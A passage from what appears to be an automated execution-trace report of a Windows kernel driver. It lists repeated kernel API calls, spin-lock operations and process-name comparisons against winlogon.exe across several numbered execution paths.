| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| KeInitializeEvent | Type_unk = 0x0, State = 0, Event_unk_out = 0xffffd0002d296eb0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeWaitForMutexObject | ret_val_out = 0x102 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a763d44, SpinLock_unk_out = 0xffffe0003a763d44, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a763d44, NewIrql_unk = 0x0, SpinLock_unk_out = 0xffffe0003a763d44 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55af20 |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x60, Tag = 0x32544c46, ret_val_ptr_out = 0xffffe0003a7872f0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x0 |
| KeInsertQueueDpc | Dpc_unk = 0xfffff800fc55c290, SystemArgument1_ptr = 0x0, SystemArgument2_ptr = 0x0, Dpc_unk_out = 0xfffff800fc55c290, ret_val_out = 1 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a763d44, SpinLock_unk_out = 0xffffe0003a763d44, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a763d44, NewIrql_unk = 0x0, SpinLock_unk_out = 0xffffe0003a763d44 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a763d44, SpinLock_unk_out = 0xffffe0003a763d44, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a763d44, NewIrql_unk = 0x0, SpinLock_unk_out = 0xffffe0003a763d44 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55af20 |
| IofCallDriver | DeviceObject_unk = 0xffffe0004b328d00, Irp_unk = 0xffffe0003b7a1ad0, Irp_unk_out = 0xffffe0003b7a1ad0, ret_val_out = 0x103 |
| KeInitializeEvent | Type_unk = 0x0, State = 0, Event_unk_out = 0xffffd0002d296eb0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeWaitForMutexObject | ret_val_out = 0x102 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a766464, SpinLock_unk_out = 0xffffe0003a766464, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a766464, NewIrql_unk = 0x0, SpinLock_unk_out = 0xffffe0003a766464 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55af20 |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x60, Tag = 0x32544c46, ret_val_ptr_out = 0xffffe0003a787280 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x0 |
| KeInsertQueueDpc | Dpc_unk = 0xfffff800fc55c290, SystemArgument1_ptr = 0x0, SystemArgument2_ptr = 0x0, Dpc_unk_out = 0xfffff800fc55c290, ret_val_out = 1 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a766464, SpinLock_unk_out = 0xffffe0003a766464, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a766464, NewIrql_unk = 0x0, SpinLock_unk_out = 0xffffe0003a766464 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a766464, SpinLock_unk_out = 0xffffe0003a766464, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a766464, NewIrql_unk = 0x0, SpinLock_unk_out = 0xffffe0003a766464 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55af20 |
| IofCallDriver | DeviceObject_unk = 0xffffe0004c9e76b0, Irp_unk = 0xffffe0003b7a1ad0, Irp_unk_out = 0xffffe0003b7a1ad0, ret_val_out = 0x103 |
Execution Path #162 (length: 42, count: 1, processes: 1)
»
| Information | Value |
|---|---|
| Sequence Length | 42 |
Processes
»
| Process | Count |
|---|---|
| Process 2 (System, PID: 4) | 1 |
Sequence
»
| Symbol | Parameters |
|---|---|
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003b6d0080 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003b6d04d0 |
| _stricmp | _Str1 = cmd.exe, _Str2 = winlogon.exe, ret_val_out = -20 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003b6d0080 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003b6d04d0 |
| _stricmp | _Str1 = cmd.exe, _Str2 = winlogon.exe, ret_val_out = -20 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003b6d0080 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003b6d04d0 |
| _stricmp | _Str1 = cmd.exe, _Str2 = winlogon.exe, ret_val_out = -20 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003b6d0080 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003b6d04d0 |
| _stricmp | _Str1 = cmd.exe, _Str2 = winlogon.exe, ret_val_out = -20 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003b6d0080 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003b6d04d0 |
| _stricmp | _Str1 = cmd.exe, _Str2 = winlogon.exe, ret_val_out = -20 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003b6d0080 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003b6d04d0 |
| _stricmp | _Str1 = cmd.exe, _Str2 = winlogon.exe, ret_val_out = -20 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a769904, SpinLock_unk_out = 0xffffe0003a769904, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a769904, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a769904 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a7858ac, SpinLock_unk_out = 0xffffe0003a7858ac, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a7858ac, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a7858ac |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| AfdDisconnectEventHandler | ret_val_out = 0x0 |
Execution Path #51 (length: 726, count: 1, processes: 1)
»
| Information | Value |
|---|---|
| Sequence Length | 726 |
Processes
»
| Process | Count |
|---|---|
| Process 25 (winlogon.exe, PID: 508) | 1 |
Sequence
»
| Symbol | Parameters |
|---|---|
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
